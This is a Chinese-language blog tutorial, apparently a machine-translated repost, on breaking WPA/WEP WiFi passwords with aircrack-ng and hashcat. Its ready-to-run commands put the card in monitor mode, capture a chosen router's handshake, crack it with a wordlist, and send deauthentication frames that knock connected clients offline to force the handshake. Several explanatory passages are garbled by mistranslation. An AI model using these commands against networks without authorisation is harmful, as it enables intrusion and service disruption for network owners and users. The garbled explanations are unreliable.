無線WiFi破解工具 – Aircrack

為了能在arm的kali版本跑Monitor Mode in TP-Link-TL-WN722N-adapter  弄了好久終於弄出來拉!

簡介

aircrack 是一個比較出名的用於破解 WEP 和 WPA 智能的無線網絡的假工具,由 6 個不同的部分組成:

  1. aircrack-ng 用於破解 WEP 以及 WPA-PSK 密碼。aircrack-ng 工具收集了新西蘭的信息,aircrack-ng 將分析這些數據,並確定使用中的密碼。
  2. airdecap-ng 解讀被破解的網絡數據包
  3. airmon-ng 為使用整個 aircrack-ng 套件配置一個網卡
  4. aireplay-ng 在無線網絡中產生可能在恢復中的 WEP 損失價值的流量
  5. airodump-ng 被 aircrack-ng 用於破解 WEP 密碼的 802.11 幀
  6. 工具為微調提供分類工具箱

文章


配置無線網卡

  • WM Ware(啟動後)虛擬機->可移動設備->Ralink 802.11 n Wlan(顯卡型號)->連接(斷開與主機的連接)
  • 視箱虛擬機狀態下->將設備插入主機->設置->USB設備->添加->刪除除供應商標識(VendorID)和產品標識(ProductID)之外的參數->啟動->插入設備
  • 驗證是否連接成功lsusb 空氣蒙 如果配置 配置文件出現無線網卡型號即為成功

無線基礎命令

iwlist       #用於對/proc/net/wireless文件進行分析,得出無線網卡相關信息
    iwlist wlan0掃描| grep " ESSID "     #查看當前所有的AP名稱

配置文件
    iwconfig wlan0                  scan #掃描無線接入點
    iwconfig wlan0暱稱黑客         #添加名稱

例子

以無線網卡名義 wlan0 舉例

airmon-ng start wlan0    #啟動網卡監聽模式
airmon-ng check kill     #關閉干擾程序

airodump-ng wlan0mon     #開啟抓包,獲取附件無線網絡
列名意味
BSSID(Basic Service SetIdentifier)AP的MAC地址
PWR(Power)信號強度
Beacons美聯社發出的引用引用數,幾處採集點(1M)
Data當前數據傳輸量
/s過去 00 秒內精彩數據1 數量
CH(Channel)AP所屬的頻道
MBAP的最大傳輸速度;MB=11 => 802.11b,MB=22 => 802.11b+,MB>22 => 802.11g;帶。的表示短封包標頭、速度快、更破解破解
ENC(Encryption)使用智能算法體系
CIPHER檢測到的智能算法
AUTH(Authority)認證方式
ESSID(The Extended Service Set Identifier)AP的名稱
airodump-ng -c 6 --bssid E0:24:81:AF:F3:A8 -w wireless wlan0mon      #指定特定的wifi抓抓包,出現握手則抓包成功
# -c 指定信道,上面已經標記了目標焦點的信道(CH)
# -bssid 指定目標路由器的BSSID,就是廣告標記的BSSID 
# -w 指定抓取的數據包保存的目錄

aircrack-ng -a2 -b E0:24:81:AF:F3:A8 -w pass.txt wireless-01.cap     #跑包

使用hashcat爆破(自己跑WPA/WPA2/PSK智能的)

用 aircrack-ng 把 cap 轉換成 hccap 類型數據包(會自動添加後綴名 .hccap)

aircrack-ng wireless-01.cap -J wireless
hashcat -m 2500 wireless.hccap pass.txt --force                      #用hashcat破解WPA/PSK密碼

複製提示“Old hccap format detected! You need to update”可以先一步的命令改為

aircrack-ng wireless-01.cap -j wireless

解除認證

注意如果抓不到抓包把對方抓下線,這樣就會抓包成功

aireplay-ng -0 10 -a <無線路由器的MAC地址> -c <連接上的設備MAC地址> wlan0mon
 # -0 衝突攻擊模式,在一起發送次數,一般使用模式分類。
# -a 無線網mac 地址
# -c 連接上的客戶端 mac 地址,就是那個 STATION


資料來源:https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/aircrack.md
Back To Top
error: 內容被保護 !!